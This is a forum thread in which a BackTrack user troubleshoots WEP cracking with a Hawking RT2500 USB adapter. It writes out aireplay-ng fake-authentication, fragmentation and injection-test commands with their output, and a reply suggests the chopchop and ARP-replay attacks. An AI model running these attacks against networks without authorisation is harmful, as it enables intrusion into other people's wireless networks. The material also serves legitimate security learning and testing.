Hawking Wireless G and Aireplay
OK, so I'm new to the remote exploit forums so be gentle (I know the awe-inspiring power of a moderator scorned).
Basically, I hopped on the USB wifi card bandwagon (I'm a recovering PCMCIA junkie). So I'm running through some issues I'm encountering with the new card. First the obligatory particulars:
It's a Hawking wireless G USB wireless adapter.
It's an RT2500 chipset adapter.
I'm running BT3BETA (the current latest, I think released in Dec).
So, WPA/WPA2 cracking is going OK (well, it's pretty much just a grab and bag anyway) but WEP cracking is spotty. And here's why I say that.
First, as usual I place the card in monitor mode (it's rausb0).
Then I perform the association and authentication step (aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI rausb0). Both successful.
The problem starts when I go to perform the fragmentation attack. So, I run aireplay-ng -5 -b $AP -h $WIFI rausb0 and this is what I get after I select the packet to use:
09:19:51 Data packet found!
09:19:51 Sending fragmented packet
09:19:53 No answer, repeating...
<repeats a bit>
09:20:39 Still nothing, trying another packet...
This goes on for a bit, but never grabs the fragment xor file.
Sometimes when I mess with antenna positioning I get:
09:24:10 Data packet found!
09:24:10 Sending fragmented packet
09:24:12 No answer, repeating...
09:24:12 Trying a LLC NULL packet
09:24:12 Sending fragmented packet
09:24:12 Got RELAYED packet!!
09:24:12 Trying to get 384 bytes of a keystream
09:24:14 No answer, repeating...
(the "Got RELAYED packet!!" and keystream lines are different than before)
Sometimes I get a third variation with a line saying not enough acks.
The problem is I've seen, on the same card, the fragment file created in like the first run-through of a packet grabbed. Another time the second. I'm trying to get a better understanding of whether it's something I'm doing wrong or just signal, as I've had mixed results being able to crack an AP right next to me or one next door (don't worry, my girlfriend's sister lives next door to her and I got her permission, so don't hop on me, Trolls!)
I got so curious I ran the inject test built into aircrack with the following syntax:
aireplay-ng -9 -e $SSID -a $AP -i ath0 rausb0
09:30:33 Waiting for beacon frame (BSSID: 00:19:E4:73:53:B9) on channel 11
09:30:33 Trying broadcast probe requests...
09:30:33 Injection is working!
09:30:35 Found 1 AP
09:30:35 Trying directed probe requests...
09:30:35 00:19:E4:73:53:B9 - channel: 11 - '2WIRE744'
09:30:37 Ping (min/avg/max): 0.695ms/58.322ms/68.006ms Power: 24.20
09:30:37 30/30: 100%
09:30:37 Trying card-to-card injection...
09:30:37 Attack -0: OK
09:30:37 Attack -1 (open): OK
09:30:38 Attack -1 (psk): OK
09:30:39 Attack -2/-3/-4: OK
09:30:43 Attack -5: Failed
ath0 is an internal wifi in my laptop.
Guess I wrote a book there, but any help is appreciated in advance.
Have you tried the -4 attack or the -3 attack? Please let us know how you get on with those.
-4 worked with the card. Any idea why -5 isn't? MAC filtering, you think?
Sometimes both attacks don't work. I imagine that's why there are two different ones.
Well hey, thanks for the help. WEP down, dictionary brute force of WPA/WPA2 down, airpwn (just fun) and now...time for learning about airolib and the aircrack-ng server pieces.